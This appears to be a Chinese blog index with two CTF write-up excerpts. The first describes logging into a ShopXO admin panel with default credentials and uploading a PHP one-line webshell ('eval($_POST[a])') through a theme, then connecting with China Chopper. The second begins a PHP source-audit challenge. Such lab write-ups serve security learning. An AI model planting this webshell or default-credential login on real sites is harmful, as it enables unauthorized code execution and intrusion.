返回顶部
摘要: 题目给了一个网站的模板 通过扫描进入后台admin.php 默认用户名admin 默认密码搜索得shopxo 在当前主题那里下载默认主题 然后在主题里面传一个一句话木马 <?php @eval($_POST[a]); phpinfo(); ?> 用菜刀连接(路径可在浏览器查看源码中找到) 打开fla 阅读全文
posted @ 2020-09-10 20:56 星火不辍 阅读(265) 评论(0) 推荐(0) 编辑
摘要: 扫描目录 看到 robots.txt 访问 在响应头里面找到了提示信息 查看 源代码如下: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //le 阅读全文
posted @ 2020-09-10 15:29 星火不辍 阅读(182) 评论(0) 推荐(0) 编辑